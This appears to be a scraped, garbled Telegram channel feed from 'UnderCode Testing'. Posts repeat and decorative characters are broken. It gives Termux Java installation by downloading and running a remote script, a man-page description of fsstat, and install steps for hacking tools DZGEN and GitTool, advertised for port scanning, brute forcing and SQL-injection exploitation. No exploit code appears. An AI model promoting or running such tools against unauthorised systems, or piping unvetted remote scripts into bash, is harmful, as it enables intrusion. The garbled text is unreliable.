Thats All
@Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (og)
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆHow Install Java Jdk on Termux for many requirements and usefull!& without root
t.me/UnderCodeTestingOfficial
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
1)pkg update
2) pkg upgrade
3) pkg install wget
4) wget https://raw.githubusercontent.com/MasterDevX/java/master/installjava
5) bash installjava
6) Now sucessfull installed jdk termux
@Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (og)
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆHow Install Java Jdk on Termux for many requirements and usefull!& without root
t.me/UnderCodeTestingOfficial
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
1)pkg update
2) pkg upgrade
3) pkg install wget
4) wget https://raw.githubusercontent.com/MasterDevX/java/master/installjava
5) bash installjava
6) Now sucessfull installed jdk termux
@Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (og)
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆfsstat displays the details associated with a file system. The output of this command is file system specific. At a minimum, the range of meta-data values (inode numbers) and content units (blocks or clusters) are given. Also given are details from the Super Block, such as mount times and and features. For file systems that use groups (FFS and EXT2FS), the layout of each group is listed.
>For a FAT file system, the FAT table is displayed in a condensed format. Note that the data is in sectors and not in clusters.
t.me/UnderCodeTestingOfficial
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
1) Its kali pre-installed tool
2) To Run
> fsstat [-f fstype ] [-i imgtype] [-o imgoffset] [-b dev_sector_size] [-tvV] image [images]
๐ฆCommands :
-t type
Print the file system type only.
-f fstype
Specify the file system type. Use โ-f listโ to list the supported file system types. If not given, autodetection methods are used.
-i imgtype
Identify the type of image file, such as raw. Use โ-i listโ to list the supported types. If not given, autodetection methods are used.
-o imgoffset
The sector offset where the file system starts in the image.
-b dev_sector_size
The size, in bytes, of the underlying device sectors. If not given, the value in the image format is used (if it exists) or 512-bytes is assumed.
-v
Verbose output of debugging statements to stderr
-V
Display version
Written By Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (og)
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆfsstat displays the details associated with a file system. The output of this command is file system specific. At a minimum, the range of meta-data values (inode numbers) and content units (blocks or clusters) are given. Also given are details from the Super Block, such as mount times and and features. For file systems that use groups (FFS and EXT2FS), the layout of each group is listed.
>For a FAT file system, the FAT table is displayed in a condensed format. Note that the data is in sectors and not in clusters.
t.me/UnderCodeTestingOfficial
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
1) Its kali pre-installed tool
2) To Run
> fsstat [-f fstype ] [-i imgtype] [-o imgoffset] [-b dev_sector_size] [-tvV] image [images]
๐ฆCommands :
-t type
Print the file system type only.
-f fstype
Specify the file system type. Use โ-f listโ to list the supported file system types. If not given, autodetection methods are used.
-i imgtype
Identify the type of image file, such as raw. Use โ-i listโ to list the supported types. If not given, autodetection methods are used.
-o imgoffset
The sector offset where the file system starts in the image.
-b dev_sector_size
The size, in bytes, of the underlying device sectors. If not given, the value in the image format is used (if it exists) or 512-bytes is assumed.
-v
Verbose output of debugging statements to stderr
-V
Display version
Written By Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (og)
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆA Simple Termux(root) /Kali/parrot tools To scan port , Brute force protocol Service ,scan website , exploit system , exploit sql injection website and also have other characteristics
Twitter.com/UnderCodeTC
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
1) git clone https://github.com/joker25000/DZGEN
2) The installation the tool
3) cd DZGEN
4) chmod +x DZGEN
5) ./DZGEN
6) Run DZGEN tool in terminal
> DZGEN
๐ฆTested By UnderCode
> kali
> debian
@Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (og)
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆA Simple Termux(root) /Kali/parrot tools To scan port , Brute force protocol Service ,scan website , exploit system , exploit sql injection website and also have other characteristics
Twitter.com/UnderCodeTC
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
1) git clone https://github.com/joker25000/DZGEN
2) The installation the tool
3) cd DZGEN
4) chmod +x DZGEN
5) ./DZGEN
6) Run DZGEN tool in terminal
> DZGEN
๐ฆTested By UnderCode
> kali
> debian
@Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (og)
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆGit Best Tools Hacking For Kali Linux 2018
t.me/iOSDeveloppers
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
1) git clone https://github.com/Ha3MrX/GitTool
2) cd GitTool
3) chmod +x gittool.sh
4) ./gittool.sh
๐ฆVid Tutorial
> https://www.youtube.com/watch?v=APkZOXJ2rnk
๐ฆFeatures:
See screanshaot below iam sure you will like this tool
@Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (og)
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆGit Best Tools Hacking For Kali Linux 2018
t.me/iOSDeveloppers
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
1) git clone https://github.com/Ha3MrX/GitTool
2) cd GitTool
3) chmod +x gittool.sh
4) ./gittool.sh
๐ฆVid Tutorial
> https://www.youtube.com/watch?v=APkZOXJ2rnk
๐ฆFeatures:
See screanshaot below iam sure you will like this tool
@Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (og)
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
Telegram
IOS JAILBREAK BY UNDERCODE TESTING OFFICIAL
WELCOME TO UNDERCODE TESTING
FOR IOS JAILBREAK NEWS & TRICKS
๐ ถ๐ ธ๐๐ ป๐ฐ๐ฑ
@UndercOdeTesting
๐๐พ๐๐๐๐ฑ๐ ด
@UnderCodeTestingCompany
๐ ต๐ฐ๐ ฒ๐ ด๐ฑ๐พ๐พ๐ บ
@UndercOdeTestingCompany
๐ ธ๐ ฝ๐๐๐ฐ๐ ถ๐๐ฐ๐ ผ
@UndercOdeTestingCompany
๐๐๐ ธ๐๐๐ ด๐
@UndercOdeTC
UNDERCODE.ORG
FOR IOS JAILBREAK NEWS & TRICKS
๐ ถ๐ ธ๐๐ ป๐ฐ๐ฑ
@UndercOdeTesting
๐๐พ๐๐๐๐ฑ๐ ด
@UnderCodeTestingCompany
๐ ต๐ฐ๐ ฒ๐ ด๐ฑ๐พ๐พ๐ บ
@UndercOdeTestingCompany
๐ ธ๐ ฝ๐๐๐ฐ๐ ถ๐๐ฐ๐ ผ
@UndercOdeTestingCompany
๐๐๐ ธ๐๐๐ ด๐
@UndercOdeTC
UNDERCODE.ORG